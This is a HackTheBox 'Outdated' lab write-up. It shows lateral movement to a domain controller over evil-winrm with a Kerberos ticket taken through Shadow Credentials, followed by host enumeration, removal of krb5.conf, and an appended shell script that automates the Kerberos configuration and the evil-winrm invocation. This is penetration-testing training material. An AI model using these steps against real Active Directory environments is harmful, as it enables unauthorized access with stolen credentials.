WinRM


Now that the sflowers user is [[Outdated_Shadow_Credentials#Shadow Credentials|fully compromised]] via [Shadow Credentials](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab), I can connect directly to the DC host over WinRM using the Kerberos ticket in the ccache. This works because sflowers is a member of the Remote Management Users group, which is what gates WinRM logon for non-administrators (Remote Desktop Users would only grant RDP, not WinRM).

┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ KRB5CCNAME=ShadowCredentials/sflowers@dc.outdated.htb.ccache evil-winrm -i dc.outdated.htb -r OUTDATED.HTB
 
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sflowers\Documents> whoami
outdated\sflowers
*Evil-WinRM* PS C:\Users\sflowers\Documents> hostname
DC
*Evil-WinRM* PS C:\Users\sflowers\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 3:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::18e
   IPv6 Address. . . . . . . . . . . : dead:beef::f5bd:4446:16d5:72f5
   Link-local IPv6 Address . . . . . : fe80::f5bd:4446:16d5:72f5%15
   IPv4 Address. . . . . . . . . . . : 10.10.11.175
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
                                       10.10.10.2
 
Ethernet adapter vEthernet (vSwitch):
 
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 172.16.20.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 0.0.0.0

Lateral movement complete: initial foothold on the DC host, dc.outdated.htb, as the sflowers user via WinRM, authenticated with the Kerberos ticket obtained through Shadow Credentials. The second adapter (vEthernet, 172.16.20.1) shows the DC also fronts an internal virtual switch, worth noting for later enumeration.

cleanup


┌──(kali㉿kali)-[~/…/htb/labs/outdated/ShadowCredentials]
└─$ sudo rm /etc/krb5.conf

Removing the /etc/krb5.conf file, which was written for Kerberos authentication with both BloodyAD and evil-winrm and is no longer needed once the foothold is established.
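The write-up assumes the /etc/krb5.conf that BloodyAD and evil-winrm relied on, then removes it. The script below is an added example, not part of the original write-up or of either tool: it generates the minimal krb5.conf that Kerberos authentication needs (realm in uppercase, the DC as KDC, domain-to-realm mapping), builds the evil-winrm command line that consumes the ccache, and provides the cleanup step for both the config and the ticket cache. The realm OUTDATED.HTB and KDC dc.outdated.htb are taken from the commands above; the output paths and function names are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the original write-up): krb5.conf generation,
# evil-winrm Kerberos invocation, and cleanup of the Kerberos artifacts.
# Assumed: realm OUTDATED.HTB, KDC dc.outdated.htb, caller-chosen file paths.
set -eu

# Write a minimal krb5.conf. The realm name must be UPPERCASE (Kerberos realm
# names are case-sensitive and AD realms are uppercase), the KDC is the DC FQDN,
# and the lowercase DNS domain is mapped to the realm so hostname-to-realm
# resolution works without relying on DNS SRV lookups.
write_krb5_conf() {
    realm="$1"; kdc="$2"; out="$3"
    domain="$(printf '%s' "$realm" | tr '[:upper:]' '[:lower:]')"
    cat > "$out" <<EOF
[libdefaults]
    default_realm = ${realm}
    dns_lookup_kdc = false
    dns_lookup_realm = false

[realms]
    ${realm} = {
        kdc = ${kdc}
        admin_server = ${kdc}
    }

[domain_realm]
    .${domain} = ${realm}
    ${domain} = ${realm}
EOF
}

# Read default_realm back from a krb5.conf; used to confirm the realm in the
# config matches the one the TGT in the ccache was issued for.
krb5_default_realm() {
    awk -F'=' '/^[[:space:]]*default_realm/ { gsub(/[[:space:]]/, "", $2); print $2 }' "$1"
}

# Build the evil-winrm command. Two practical points: pass an absolute ccache
# path so KRB5CCNAME resolves regardless of the working directory, and connect
# by the FQDN that matches the target's HTTP/<fqdn> SPN, never by IP address,
# otherwise the Kerberos service ticket request fails.
evil_winrm_kerberos_cmd() {
    ccache="$1"; host="$2"; realm="$3"
    printf 'KRB5CCNAME=%s evil-winrm -i %s -r %s\n' "$ccache" "$host" "$realm"
}

# Cleanup: remove the krb5.conf and the ticket cache so no usable credential
# material is left on the attacking host once the session is no longer needed.
cleanup_kerberos_artifacts() {
    conf="$1"; ccache="$2"
    rm -f "$conf" "$ccache"
}

# Demo run only when invoked as: sh this.sh demo
if [ "${1:-}" = "demo" ]; then
    write_krb5_conf OUTDATED.HTB dc.outdated.htb /etc/krb5.conf
    echo "default_realm: $(krb5_default_realm /etc/krb5.conf)"
    evil_winrm_kerberos_cmd "$PWD/ShadowCredentials/sflowers@dc.outdated.htb.ccache" \
        dc.outdated.htb OUTDATED.HTB
fi
```

Run the demo step as root (or with sudo) when writing to /etc/krb5.conf; the `cleanup_kerberos_artifacts` function is the scripted equivalent of the `sudo rm /etc/krb5.conf` above, extended to also drop the ccache.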